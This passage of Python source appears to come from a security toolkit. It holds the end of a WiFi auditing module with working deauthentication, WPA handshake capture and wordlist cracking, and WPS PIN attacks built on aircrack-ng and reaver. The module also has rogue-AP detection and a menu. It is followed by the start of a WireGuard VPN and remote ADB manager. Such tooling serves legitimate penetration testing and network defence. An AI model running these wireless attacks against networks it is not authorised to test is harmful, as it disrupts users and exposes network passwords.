                        mac=parts[0].upper(),
                        signal=int(parts[3]) if parts[3].strip().lstrip('-').isdigit() else 0,
                        frames=int(parts[4]) if parts[4].strip().isdigit() else 0,
                        bssid=parts[5].strip().upper() if len(parts) > 5 else '',
                        probe=parts[6].strip() if len(parts) > 6 else ''
                    )
                    self.clients.append(client)
                    # Associate with AP
                    if client.bssid in self.scan_results:
                        self.scan_results[client.bssid].clients.append(client.mac)
        except Exception:
            pass
def get_scan_results(self) -> Dict:
"""Return current scan results."""
return {
'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()],
'clients': [self._client_to_dict(c) for c in self.clients],
'count': len(self.scan_results)
}
# ── Handshake Capture ────────────────────────────────────────────────
    def capture_handshake(self, interface: str, bssid: str, channel: int,
                          deauth_count: int = 5, timeout: int = 60) -> str:
        """Capture WPA handshake. Returns job_id for async polling.

        Starts airodump-ng locked to the target BSSID/channel, sends
        deauth frames with aireplay-ng to force clients to reauthenticate,
        then polls aircrack-ng until it reports a captured handshake or
        the timeout expires.  Runs entirely in a daemon thread; progress
        is stored in self._jobs[job_id].

        Args:
            interface: Monitor-mode interface.
            bssid: Target access point MAC.
            channel: Target AP channel.
            deauth_count: Number of deauth bursts to transmit.
            timeout: Seconds to wait for a handshake before giving up.
        """
        job_id = f'handshake_{int(time.time())}'
        self._jobs[job_id] = {
            'type': 'handshake', 'status': 'running', 'bssid': bssid,
            'result': None, 'started': time.time()
        }
        def _capture():
            try:
                # Set channel
                self.set_channel(interface, channel)
                prefix = os.path.join(self.captures_dir, f'hs_{bssid.replace(":", "")}_{int(time.time())}')
                # Start capture
                cap_proc = subprocess.Popen(
                    [self.airodump, '-c', str(channel), '--bssid', bssid,
                     '-w', prefix, interface],
                    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
                )
                # Send deauths after short delay so airodump is already
                # listening when clients reconnect.
                time.sleep(3)
                if self.aireplay:
                    subprocess.run(
                        [self.aireplay, '-0', str(deauth_count), '-a', bssid, interface],
                        capture_output=True, timeout=15
                    )
                # Wait for handshake: poll the capture file with aircrack-ng
                # every 2 seconds until it confirms a handshake.
                cap_file = prefix + '-01.cap'
                start = time.time()
                captured = False
                while time.time() - start < timeout:
                    if os.path.exists(cap_file) and self.aircrack:
                        check = subprocess.run(
                            [self.aircrack, '-a', '2', '-b', bssid, cap_file],
                            capture_output=True, text=True, timeout=10
                        )
                        if '1 handshake' in check.stdout.lower() or 'valid handshake' in check.stdout.lower():
                            captured = True
                            break
                    time.sleep(2)
                # SIGINT lets airodump-ng flush and close the capture file.
                cap_proc.send_signal(signal.SIGINT)
                cap_proc.wait(timeout=5)
                if captured:
                    self._jobs[job_id]['status'] = 'complete'
                    self._jobs[job_id]['result'] = {
                        'ok': True, 'capture_file': cap_file, 'bssid': bssid,
                        'message': f'Handshake captured for {bssid}'
                    }
                else:
                    # Timed out — still report the partial capture file if any.
                    self._jobs[job_id]['status'] = 'complete'
                    self._jobs[job_id]['result'] = {
                        'ok': False, 'error': 'Handshake capture timed out',
                        'capture_file': cap_file if os.path.exists(cap_file) else None
                    }
            except Exception as e:
                self._jobs[job_id]['status'] = 'error'
                self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
        threading.Thread(target=_capture, daemon=True).start()
        return job_id
def crack_handshake(self, capture_file: str, wordlist: str, bssid: str = None) -> str:
    """Crack captured handshake with wordlist. Returns job_id.

    Runs aircrack-ng in a daemon thread with a 1-hour cap; poll the
    returned job id with get_job(). Returns '' immediately when
    aircrack-ng is not installed.
    """
    if not self.aircrack:
        return ''
    job_id = f'crack_{int(time.time())}'
    self._jobs[job_id] = {
        'type': 'crack', 'status': 'running',
        'result': None, 'started': time.time()
    }
    def _crack():
        try:
            # -b pins the target network when a BSSID was supplied.
            cmd = [self.aircrack, '-w', wordlist, '-b', bssid, capture_file] if bssid else \
                  [self.aircrack, '-w', wordlist, capture_file]
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
            # Parse result
            key_match = re.search(r'KEY FOUND!\s*\[\s*(.+?)\s*\]', result.stdout)
            if key_match:
                self._jobs[job_id]['status'] = 'complete'
                self._jobs[job_id]['result'] = {
                    'ok': True, 'key': key_match.group(1), 'message': 'Key found!'
                }
            else:
                self._jobs[job_id]['status'] = 'complete'
                self._jobs[job_id]['result'] = {
                    'ok': False, 'error': 'Key not found in wordlist'
                }
        except subprocess.TimeoutExpired:
            self._jobs[job_id]['status'] = 'error'
            self._jobs[job_id]['result'] = {'ok': False, 'error': 'Crack timeout (1hr)'}
        except Exception as e:
            self._jobs[job_id]['status'] = 'error'
            self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
    threading.Thread(target=_crack, daemon=True).start()
    return job_id
# ── Deauth Attack ────────────────────────────────────────────────────
def deauth(self, interface: str, bssid: str, client: str = None,
           count: int = 10) -> Dict:
    """Send 802.11 deauthentication frames at ``bssid``.

    Broadcast by default; when ``client`` is given, only that station is
    targeted. Requires aireplay-ng and a monitor-mode interface.
    """
    if not self.aireplay:
        return {'ok': False, 'error': 'aireplay-ng not found'}
    iface = interface or self.monitor_interface
    if not iface:
        return {'ok': False, 'error': 'No monitor interface'}
    cmd = [self.aireplay, '-0', str(count), '-a', bssid]
    if client:
        cmd.extend(['-c', client])
    cmd.append(iface)
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
    except subprocess.TimeoutExpired:
        return {'ok': False, 'error': 'Deauth timeout'}
    except Exception as e:
        return {'ok': False, 'error': str(e)}
    target_note = f' targeting {client}' if client else ' (broadcast)'
    return {
        'ok': True,
        'message': f'Sent {count} deauth frames to {bssid}' + target_note,
        'output': proc.stdout
    }
# ── Rogue AP Detection ───────────────────────────────────────────────
def save_known_aps(self):
    """Persist the current scan as the rogue-detection baseline (known_aps.json)."""
    baseline = []
    for ap in self.scan_results.values():
        baseline.append(self._ap_to_dict(ap))
    self.known_aps = baseline
    path = os.path.join(self.data_dir, 'known_aps.json')
    with open(path, 'w') as fh:
        json.dump(self.known_aps, fh, indent=2)
    return {'ok': True, 'count': len(self.known_aps)}
def load_known_aps(self) -> List[Dict]:
    """Load the saved AP baseline from disk into ``self.known_aps``.

    Returns:
        The baseline list. When no baseline file exists, the cached
        ``self.known_aps`` is returned unchanged — the return is now
        unconditional so callers always receive a list (the original
        could fall through and return None when the file was absent,
        contradicting the annotation).
    """
    known_file = os.path.join(self.data_dir, 'known_aps.json')
    if os.path.exists(known_file):
        with open(known_file) as f:
            self.known_aps = json.load(f)
    return self.known_aps
def detect_rogue_aps(self) -> Dict:
    """Diff the live scan against the saved baseline for rogue APs.

    Flags: unknown BSSID broadcasting a known SSID (evil twin, high),
    a completely new AP (low), and a known BSSID now beaconing a
    different SSID (medium).
    """
    if not self.known_aps:
        self.load_known_aps()
    if not self.known_aps:
        return {'ok': False, 'error': 'No baseline APs saved. Run save_known_aps first.'}
    baseline_bssids = set()
    baseline_ssids = set()
    baseline_pairs = set()
    for entry in self.known_aps:
        baseline_bssids.add(entry['bssid'])
        if entry['ssid']:
            baseline_ssids.add(entry['ssid'])
        baseline_pairs.add((entry['bssid'], entry['ssid']))
    alerts = []
    for bssid, ap in self.scan_results.items():
        if bssid in baseline_bssids:
            # Known radio — only alert if it now advertises a new SSID.
            if ap.ssid and (bssid, ap.ssid) not in baseline_pairs:
                alerts.append({
                    'type': 'ssid_change',
                    'severity': 'medium',
                    'bssid': bssid,
                    'ssid': ap.ssid,
                    'message': f'Known AP {bssid} changed SSID to "{ap.ssid}"'
                })
            continue
        if ap.ssid in baseline_ssids:
            # Same SSID, different BSSID = possible evil twin
            alerts.append({
                'type': 'evil_twin',
                'severity': 'high',
                'bssid': bssid,
                'ssid': ap.ssid,
                'channel': ap.channel,
                'signal': ap.signal,
                'message': f'Possible evil twin: SSID "{ap.ssid}" from unknown BSSID {bssid}'
            })
        else:
            # Completely new AP
            alerts.append({
                'type': 'new_ap',
                'severity': 'low',
                'bssid': bssid,
                'ssid': ap.ssid,
                'channel': ap.channel,
                'signal': ap.signal,
                'message': f'New AP detected: "{ap.ssid}" ({bssid})'
            })
    return {
        'ok': True,
        'alerts': alerts,
        'alert_count': len(alerts),
        'scanned': len(self.scan_results),
        'known': len(self.known_aps)
    }
# ── WPS Attack ───────────────────────────────────────────────────────
def wps_scan(self, interface: str = None) -> Dict:
    """Enumerate WPS-enabled networks using wash on the monitor interface."""
    iface = interface or self.monitor_interface
    if not self.wash:
        return {'ok': False, 'error': 'wash not found'}
    if not iface:
        return {'ok': False, 'error': 'No monitor interface'}
    try:
        proc = subprocess.run(
            [self.wash, '-i', iface, '-s'],
            capture_output=True, text=True, timeout=15
        )
    except Exception as e:
        return {'ok': False, 'error': str(e)}
    networks = []
    for row in proc.stdout.splitlines():
        fields = row.split()
        # Real entries start with a MAC-style BSSID and have >= 6 columns.
        if len(fields) < 6 or not re.match(r'^[0-9A-Fa-f]{2}:', fields[0]):
            continue
        networks.append({
            'bssid': fields[0],
            'channel': fields[1],
            'rssi': fields[2],
            'wps_version': fields[3],
            'locked': fields[4].upper() == 'YES',
            'ssid': ' '.join(fields[5:])
        })
    return {'ok': True, 'networks': networks, 'count': len(networks)}
def wps_attack(self, interface: str, bssid: str, channel: int,
               pixie_dust: bool = True, timeout: int = 300) -> str:
    """Run WPS PIN attack (Pixie Dust or brute force). Returns job_id.

    Launches reaver in a daemon thread and parses the PIN / WPA PSK from
    its output; returns '' immediately when reaver is not installed.
    Poll the job id with get_job() for the outcome.
    """
    if not self.reaver:
        return ''
    job_id = f'wps_{int(time.time())}'
    self._jobs[job_id] = {
        'type': 'wps', 'status': 'running', 'bssid': bssid,
        'result': None, 'started': time.time()
    }
    def _attack():
        try:
            cmd = [self.reaver, '-i', interface, '-b', bssid, '-c', str(channel), '-vv']
            if pixie_dust:
                # -K 1 enables reaver's offline Pixie Dust attack mode.
                cmd.extend(['-K', '1'])
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
            pin_match = re.search(r'WPS PIN:\s*[\'"]?(\d+)', result.stdout)
            psk_match = re.search(r'WPA PSK:\s*[\'"]?(.+?)[\'"]?\s*$', result.stdout, re.M)
            if pin_match or psk_match:
                self._jobs[job_id]['status'] = 'complete'
                self._jobs[job_id]['result'] = {
                    'ok': True,
                    'pin': pin_match.group(1) if pin_match else None,
                    'psk': psk_match.group(1) if psk_match else None,
                    'message': 'WPS attack successful'
                }
            else:
                self._jobs[job_id]['status'] = 'complete'
                self._jobs[job_id]['result'] = {
                    'ok': False, 'error': 'WPS attack failed',
                    'output': result.stdout[-500:] if result.stdout else ''
                }
        except subprocess.TimeoutExpired:
            self._jobs[job_id]['status'] = 'error'
            self._jobs[job_id]['result'] = {'ok': False, 'error': 'WPS attack timed out'}
        except Exception as e:
            self._jobs[job_id]['status'] = 'error'
            self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
    threading.Thread(target=_attack, daemon=True).start()
    return job_id
# ── Packet Capture ───────────────────────────────────────────────────
def start_capture(self, interface: str, channel: int = None,
                  bssid: str = None, output_name: str = None) -> Dict:
    """Launch a background airodump-ng capture writing pcap+csv output."""
    if not self.airodump:
        return {'ok': False, 'error': 'airodump-ng not found'}
    iface = interface or self.monitor_interface
    if not iface:
        return {'ok': False, 'error': 'No monitor interface'}
    base = output_name if output_name else f'capture_{int(time.time())}'
    prefix = os.path.join(self.captures_dir, base)
    cmd = [self.airodump, '--output-format', 'pcap,csv', '-w', prefix]
    if channel:
        cmd.extend(['-c', str(channel)])
    if bssid:
        cmd.extend(['--bssid', bssid])
    cmd.append(iface)
    try:
        self._capture_proc = subprocess.Popen(
            cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
        )
    except Exception as e:
        return {'ok': False, 'error': str(e)}
    return {
        'ok': True,
        'message': f'Capture started on {iface}',
        'prefix': prefix,
        'pid': self._capture_proc.pid
    }
def stop_capture(self) -> Dict:
    """Stop the running airodump-ng capture, escalating to kill on failure."""
    proc = self._capture_proc
    if not proc:
        return {'ok': False, 'error': 'No capture running'}
    try:
        # SIGINT lets airodump-ng flush its output files cleanly.
        proc.send_signal(signal.SIGINT)
        proc.wait(timeout=5)
    except Exception:
        proc.kill()
    self._capture_proc = None
    return {'ok': True, 'message': 'Capture stopped'}
def list_captures(self) -> List[Dict]:
    """Enumerate saved .cap/.pcap files with their size and mtime."""
    cap_dir = Path(self.captures_dir)
    paths = sorted(cap_dir.glob('*.cap')) + sorted(cap_dir.glob('*.pcap'))
    records = []
    for path in paths:
        info = path.stat()
        records.append({
            'name': path.name,
            'path': str(path),
            'size': info.st_size,
            'modified': info.st_mtime,
        })
    return records
# ── Job Management ───────────────────────────────────────────────────
def get_job(self, job_id: str) -> Optional[Dict]:
    """Return the async job record for ``job_id``, or None if unknown."""
    return self._jobs.get(job_id, None)
def list_jobs(self) -> List[Dict]:
    """Flatten the job table into records carrying their ids."""
    records = []
    for job_id, info in self._jobs.items():
        record = {'id': job_id}
        record.update(info)
        records.append(record)
    return records
# ── Helpers ──────────────────────────────────────────────────────────
def _ap_to_dict(self, ap: AccessPoint) -> Dict:
    """Serialize an AccessPoint record into a plain JSON-safe dict."""
    fields = ('bssid', 'ssid', 'channel', 'encryption', 'cipher', 'auth',
              'signal', 'beacons', 'data_frames', 'clients')
    return {name: getattr(ap, name) for name in fields}
def _client_to_dict(self, c: WifiClient) -> Dict:
    """Serialize a WifiClient record into a plain JSON-safe dict."""
    fields = ('mac', 'bssid', 'signal', 'frames', 'probe')
    return {name: getattr(c, name) for name in fields}
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None

def get_wifi_auditor() -> WiFiAuditor:
    """Return the process-wide WiFiAuditor, creating it on first use."""
    global _instance
    if _instance is not None:
        return _instance
    _instance = WiFiAuditor()
    return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
    """CLI entry point for WiFi Auditing module.

    Interactive menu loop over the shared WiFiAuditor: interface control,
    scanning, deauth, handshake capture/crack, WPS, rogue-AP detection,
    and raw packet capture. Returns when the user selects 0.
    """
    auditor = get_wifi_auditor()
    while True:
        # Header: tool availability plus live scan state.
        tools = auditor.get_tools_status()
        available = sum(1 for v in tools.values() if v)
        print(f"\n{'='*60}")
        print(f" WiFi Auditing ({available}/{len(tools)} tools available)")
        print(f"{'='*60}")
        print(f" Monitor Interface: {auditor.monitor_interface or 'None'}")
        print(f" APs Found: {len(auditor.scan_results)}")
        print(f" Clients Found: {len(auditor.clients)}")
        print()
        print(" 1 — List Wireless Interfaces")
        print(" 2 — Enable Monitor Mode")
        print(" 3 — Disable Monitor Mode")
        print(" 4 — Scan Networks")
        print(" 5 — Deauth Attack")
        print(" 6 — Capture Handshake")
        print(" 7 — Crack Handshake")
        print(" 8 — WPS Scan")
        print(" 9 — Rogue AP Detection")
        print(" 10 — Packet Capture")
        print(" 11 — Tool Status")
        print(" 0 — Back")
        print()
        choice = input(" > ").strip()
        if choice == '0':
            break
        elif choice == '1':
            ifaces = auditor.get_interfaces()
            if ifaces:
                for i in ifaces:
                    print(f" {i['name']} mode={i['mode']} ch={i['channel']}")
            else:
                print(" No wireless interfaces found")
        elif choice == '2':
            iface = input(" Interface name: ").strip()
            result = auditor.enable_monitor(iface)
            print(f" {result.get('message', result.get('error', 'Unknown'))}")
        elif choice == '3':
            result = auditor.disable_monitor()
            print(f" {result.get('message', result.get('error', 'Unknown'))}")
        elif choice == '4':
            dur = input(" Scan duration (seconds, default 15): ").strip()
            result = auditor.scan_networks(duration=int(dur) if dur.isdigit() else 15)
            if result['ok']:
                print(f" Found {result['count']} access points:")
                for ap in result['access_points']:
                    print(f" {ap['bssid']} {ap['ssid']:<24} ch={ap['channel']} "
                          f"sig={ap['signal']}dBm {ap['encryption']}")
            else:
                print(f" Error: {result['error']}")
        elif choice == '5':
            bssid = input(" Target BSSID: ").strip()
            client = input(" Client MAC (blank=broadcast): ").strip() or None
            count = input(" Deauth count (default 10): ").strip()
            result = auditor.deauth(auditor.monitor_interface, bssid, client,
                                    int(count) if count.isdigit() else 10)
            print(f" {result.get('message', result.get('error'))}")
        elif choice == '6':
            bssid = input(" Target BSSID: ").strip()
            channel = input(" Channel: ").strip()
            if bssid and channel.isdigit():
                job_id = auditor.capture_handshake(auditor.monitor_interface, bssid, int(channel))
                print(f" Handshake capture started (job: {job_id})")
                print(" Polling for result...")
                # Block here until the background capture job finishes.
                while True:
                    job = auditor.get_job(job_id)
                    if job and job['status'] != 'running':
                        print(f" Result: {job['result']}")
                        break
                    time.sleep(3)
        elif choice == '7':
            cap = input(" Capture file path: ").strip()
            wl = input(" Wordlist path: ").strip()
            bssid = input(" BSSID (optional): ").strip() or None
            if cap and wl:
                job_id = auditor.crack_handshake(cap, wl, bssid)
                if job_id:
                    print(f" Cracking started (job: {job_id})")
                else:
                    print(" aircrack-ng not found")
        elif choice == '8':
            result = auditor.wps_scan()
            if result['ok']:
                print(f" Found {result['count']} WPS networks:")
                for n in result['networks']:
                    locked = 'LOCKED' if n['locked'] else 'open'
                    print(f" {n['bssid']} {n['ssid']:<24} WPS {n['wps_version']} {locked}")
            else:
                print(f" Error: {result['error']}")
        elif choice == '9':
            # First run offers to record a baseline; later runs diff against it.
            if not auditor.known_aps:
                print(" No baseline saved. Save current scan as baseline? (y/n)")
                if input(" > ").strip().lower() == 'y':
                    auditor.save_known_aps()
                    print(f" Saved {len(auditor.known_aps)} APs as baseline")
            else:
                result = auditor.detect_rogue_aps()
                if result['ok']:
                    print(f" Scanned: {result['scanned']} Known: {result['known']} Alerts: {result['alert_count']}")
                    for a in result['alerts']:
                        print(f" [{a['severity'].upper()}] {a['message']}")
        elif choice == '10':
            print(" 1 — Start Capture")
            print(" 2 — Stop Capture")
            print(" 3 — List Captures")
            sub = input(" > ").strip()
            if sub == '1':
                result = auditor.start_capture(auditor.monitor_interface)
                print(f" {result.get('message', result.get('error'))}")
            elif sub == '2':
                result = auditor.stop_capture()
                print(f" {result.get('message', result.get('error'))}")
            elif sub == '3':
                for c in auditor.list_captures():
                    print(f" {c['name']} ({c['size']} bytes)")
        elif choice == '11':
            for tool, avail in tools.items():
                status = 'OK' if avail else 'MISSING'
                print(f" {tool:<15} {status}")

View File

@@ -0,0 +1,503 @@
"""
WireGuard VPN Manager - Server management, client CRUD, remote ADB
Manage WireGuard VPN server, clients, and remote ADB connections over VPN tunnel.
"""
DESCRIPTION = "WireGuard VPN + Remote ADB manager"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "defense"
class WireGuardVPN:
    """Interactive WireGuard VPN menu.

    Thin CLI layer over core.wireguard's manager: server lifecycle,
    client CRUD, remote ADB over the tunnel, USB/IP forwarding, and
    client-config generation.
    """
    def __init__(self):
        # Imported lazily so this module can be listed even before
        # core.wireguard's own dependencies are satisfied.
        from core.wireguard import get_wireguard_manager
        self.mgr = get_wireguard_manager()
    def show_menu(self):
        """Render the main menu with live server/peer status."""
        status = self.mgr.get_server_status()
        running = status.get('running', False)
        endpoint = status.get('endpoint', 'N/A')
        clients = self.mgr.get_all_clients()
        peer_status = self.mgr.get_peer_status() if running else {}
        # Count online peers
        online = 0
        for c in clients:
            ps = peer_status.get(c.get('public_key', ''), {})
            hs = ps.get('latest_handshake')
            # Handshake within the last 3 minutes counts as online.
            if hs is not None and hs < 180:
                online += 1
        print(f"\n{'='*55}")
        print(" WireGuard VPN Manager")
        print(f"{'='*55}")
        print(f" Interface: {status.get('interface', 'wg0')} | "
              f"Status: {'Running' if running else 'Stopped'}")
        print(f" Endpoint: {endpoint}")
        print(f" Clients: {len(clients)} ({online} online)")
        print()
        print(" -- Server --")
        print(" 1) Server Status")
        print(" 2) Start Interface")
        print(" 3) Stop Interface")
        print(" 4) Restart Interface")
        print()
        print(" -- Clients --")
        print(" 10) List All Clients")
        print(" 11) Create New Client")
        print(" 12) View Client Detail")
        print(" 13) Delete Client")
        print(" 14) Enable/Disable Client")
        print(" 15) Import Existing Peers")
        print()
        print(" -- Remote ADB --")
        print(" 20) ADB Connect (TCP/IP)")
        print(" 21) ADB Disconnect")
        print(" 22) Auto-Connect All Peers")
        print(" 23) List Remote ADB Devices")
        print()
        print(" -- USB/IP --")
        print(" 30) USB/IP Status")
        print(" 31) Load USB/IP Modules")
        print(" 32) List Remote USB Devices")
        print(" 33) Attach USB Device")
        print(" 34) Detach USB Device")
        print(" 35) List Attached Ports")
        print()
        print(" -- Config --")
        print(" 40) Generate Client Config")
        print(" 41) Show QR Code (terminal)")
        print(" 42) Refresh UPnP Mapping")
        print()
        print(" 0) Back")
        print()
    # ── Helpers ─────────────────────────────────────────────────────
    def _pick_client(self, prompt=" Select client #: "):
        """Select a client from the list."""
        clients = self.mgr.get_all_clients()
        if not clients:
            print(" No clients configured.")
            return None
        print("\n Clients:")
        for i, c in enumerate(clients, 1):
            status = "ON " if c.get('enabled', True) else "OFF"
            print(f" {i}) [{status}] {c['name']} ({c['assigned_ip']})")
        try:
            choice = int(input(prompt).strip())
            if 1 <= choice <= len(clients):
                return clients[choice - 1]
        except (ValueError, EOFError, KeyboardInterrupt):
            pass
        return None
    def _pick_client_ip(self, prompt=" Client IP (or # to select): "):
        """Get a client IP either directly or by selection."""
        try:
            val = input(prompt).strip()
        except (EOFError, KeyboardInterrupt):
            return None
        if not val:
            return None
        # If numeric, treat as selection
        if val.isdigit():
            clients = self.mgr.get_all_clients()
            idx = int(val) - 1
            if 0 <= idx < len(clients):
                return clients[idx]['assigned_ip']
            print(" Invalid selection.")
            return None
        return val
    # ── Server ─────────────────────────────────────────────────────
    def do_server_status(self):
        """Print the WireGuard server's interface, keys, and peer count."""
        status = self.mgr.get_server_status()
        print(f"\n Server Status:")
        print(f" Interface: {status.get('interface', 'wg0')}")
        print(f" Running: {status.get('running', False)}")
        print(f" Public Key: {status.get('public_key', 'N/A')}")
        print(f" Endpoint: {status.get('endpoint', 'N/A')}")
        print(f" Listen Port: {status.get('listen_port', 'N/A')}")
        print(f" Peers: {status.get('peer_count', 0)}")
        if status.get('error'):
            print(f" Error: {status['error']}")
    def do_start(self):
        """Bring the WireGuard interface up."""
        print(" Starting WireGuard interface...")
        result = self.mgr.start_interface()
        if result.get('ok'):
            print(f" {result['message']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def do_stop(self):
        """Take the WireGuard interface down."""
        print(" Stopping WireGuard interface...")
        result = self.mgr.stop_interface()
        if result.get('ok'):
            print(f" {result['message']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def do_restart(self):
        """Restart the WireGuard interface."""
        print(" Restarting WireGuard interface...")
        result = self.mgr.restart_interface()
        if result.get('ok'):
            print(f" {result['message']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    # ── Clients ────────────────────────────────────────────────────
    def do_list_clients(self):
        """Tabulate all clients with live handshake/transfer status."""
        clients = self.mgr.get_all_clients()
        peer_status = self.mgr.get_peer_status()
        if not clients:
            print("\n No clients configured.")
            return
        print(f"\n {'Name':<20} {'IP':<16} {'Status':<8} {'Handshake':<20} {'RX/TX'}")
        print(f" {'-'*80}")
        for c in clients:
            ps = peer_status.get(c.get('public_key', ''), {})
            hs = ps.get('latest_handshake')
            hs_str = ps.get('latest_handshake_str', 'never')
            # ONLINE < 3 min since handshake; idle = handshaked before;
            # offline = never; 'disabled' overrides all.
            if hs is not None and hs < 180:
                status = 'ONLINE'
            elif hs is not None:
                status = 'idle'
            else:
                status = 'offline'
            if not c.get('enabled', True):
                status = 'disabled'
            rx = ps.get('transfer_rx_str', '-')
            tx = ps.get('transfer_tx_str', '-')
            print(f" {c['name']:<20} {c['assigned_ip']:<16} {status:<8} "
                  f"{hs_str:<20} {rx}/{tx}")
    def do_create_client(self):
        """Prompt for a name/DNS/allowed IPs and create a new client."""
        try:
            name = input(" Client name: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not name:
            print(" Name required.")
            return
        try:
            dns = input(f" DNS [{self.mgr._default_dns}]: ").strip()
            allowed = input(f" Allowed IPs [{self.mgr._default_allowed_ips}]: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        print(f" Creating client '{name}'...")
        result = self.mgr.create_client(
            name,
            dns=dns or None,
            allowed_ips=allowed or None)
        if result.get('ok'):
            client = result['client']
            print(f" Created: {client['name']} ({client['assigned_ip']})")
            print(f" ID: {client['id']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def do_view_client(self):
        """Show a selected client's config fields plus live peer stats."""
        client = self._pick_client()
        if not client:
            return
        print(f"\n Client: {client['name']}")
        print(f" ID: {client['id']}")
        print(f" IP: {client['assigned_ip']}")
        print(f" Public Key: {client['public_key']}")
        print(f" PSK: {'Yes' if client.get('preshared_key') else 'No'}")
        print(f" DNS: {client.get('dns', 'default')}")
        print(f" Allowed IPs: {client.get('allowed_ips', 'default')}")
        print(f" Enabled: {client.get('enabled', True)}")
        print(f" Created: {client.get('created_at', 'N/A')}")
        # Show live status
        peer_status = self.mgr.get_peer_status()
        ps = peer_status.get(client['public_key'], {})
        if ps:
            print(f" Handshake: {ps.get('latest_handshake_str', 'never')}")
            print(f" Endpoint: {ps.get('endpoint', 'N/A')}")
            print(f" RX: {ps.get('transfer_rx_str', '-')}")
            print(f" TX: {ps.get('transfer_tx_str', '-')}")
    def do_delete_client(self):
        """Delete a selected client after confirmation."""
        client = self._pick_client()
        if not client:
            return
        try:
            confirm = input(f" Delete '{client['name']}'? (y/N): ").strip().lower()
        except (EOFError, KeyboardInterrupt):
            return
        if confirm != 'y':
            print(" Cancelled.")
            return
        result = self.mgr.delete_client(client['id'])
        if result.get('ok'):
            print(f" {result['message']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def do_toggle_client(self):
        """Flip a selected client's enabled flag after confirmation."""
        client = self._pick_client()
        if not client:
            return
        current = client.get('enabled', True)
        new_state = not current
        action = 'Enable' if new_state else 'Disable'
        try:
            confirm = input(f" {action} '{client['name']}'? (y/N): ").strip().lower()
        except (EOFError, KeyboardInterrupt):
            return
        if confirm != 'y':
            print(" Cancelled.")
            return
        result = self.mgr.toggle_client(client['id'], new_state)
        if result.get('ok'):
            print(f" {result['message']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def do_import_peers(self):
        """Import peers already present in wg0.conf into the client DB."""
        print(" Importing existing peers from wg0.conf...")
        result = self.mgr.import_existing_peers()
        if result.get('ok'):
            print(f" Imported {result['imported']} peers.")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    # ── Remote ADB ─────────────────────────────────────────────────
    def do_adb_connect(self):
        """Connect ADB over TCP/IP to a client's tunnel IP (port 5555)."""
        clients = self.mgr.get_all_clients()
        if clients:
            print("\n Available clients:")
            for i, c in enumerate(clients, 1):
                print(f" {i}) {c['name']} ({c['assigned_ip']})")
        ip = self._pick_client_ip()
        if not ip:
            return
        print(f" Connecting to {ip}:5555...")
        result = self.mgr.adb_connect(ip)
        if result.get('ok'):
            print(f" {result['message']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def do_adb_disconnect(self):
        """Disconnect ADB from a client IP."""
        ip = self._pick_client_ip(" Client IP to disconnect: ")
        if not ip:
            return
        result = self.mgr.adb_disconnect(ip)
        print(f" {result.get('message', 'Done')}")
    def do_auto_connect(self):
        """Attempt ADB connections to every active WireGuard peer."""
        print(" Auto-connecting to all active WG peers...")
        result = self.mgr.auto_connect_peers()
        for r in result.get('results', []):
            status = "OK" if r['result'].get('ok') else "FAIL"
            print(f" [{status}] {r['name']} ({r['ip']}): "
                  f"{r['result'].get('message', r['result'].get('error', ''))}")
        if not result.get('results'):
            print(" No active peers found.")
    def do_list_adb_devices(self):
        """List ADB devices reachable through the tunnel."""
        devices = self.mgr.get_adb_remote_devices()
        if not devices:
            print("\n No remote ADB devices connected via WireGuard.")
            return
        print(f"\n Remote ADB Devices:")
        for d in devices:
            print(f" {d['serial']} - {d['state']} "
                  f"{'(' + d['model'] + ')' if d.get('model') else ''}")
    # ── USB/IP ─────────────────────────────────────────────────────
    def do_usbip_status(self):
        """Show USB/IP availability, kernel modules, and active imports."""
        status = self.mgr.get_usbip_status()
        print(f"\n USB/IP Status:")
        print(f" Available: {status['available']}")
        print(f" Modules loaded: {status['modules_loaded']}")
        print(f" Active imports: {status['active_imports']}")
        if status.get('ports'):
            for p in status['ports']:
                print(f" Port {p['port']}: {p['status']}")
    def do_load_modules(self):
        """Load the USB/IP kernel modules."""
        result = self.mgr.load_usbip_modules()
        if result.get('ok'):
            print(f" {result['message']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def do_list_remote_usb(self):
        """List USB devices exported by a remote host."""
        ip = self._pick_client_ip()
        if not ip:
            return
        print(f" Listing USB devices on {ip}...")
        result = self.mgr.usbip_list_remote(ip)
        if not result.get('ok'):
            print(f" Error: {result.get('error', 'Failed')}")
            return
        devices = result.get('devices', [])
        if not devices:
            print(" No exportable USB devices found.")
            return
        for d in devices:
            print(f" [{d['busid']}] {d['description']}")
    def do_attach_usb(self):
        """Attach a remote USB device by bus id (picked or typed)."""
        ip = self._pick_client_ip(" Remote host IP: ")
        if not ip:
            return
        # List devices first
        result = self.mgr.usbip_list_remote(ip)
        devices = result.get('devices', [])
        if not devices:
            print(" No exportable devices found.")
            return
        print("\n Available devices:")
        for i, d in enumerate(devices, 1):
            print(f" {i}) [{d['busid']}] {d['description']}")
        try:
            choice = input(" Attach #: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if choice.isdigit():
            idx = int(choice) - 1
            if 0 <= idx < len(devices):
                busid = devices[idx]['busid']
            else:
                print(" Invalid selection.")
                return
        else:
            # Non-numeric input is taken as a literal busid.
            busid = choice
        print(f" Attaching {busid} from {ip}...")
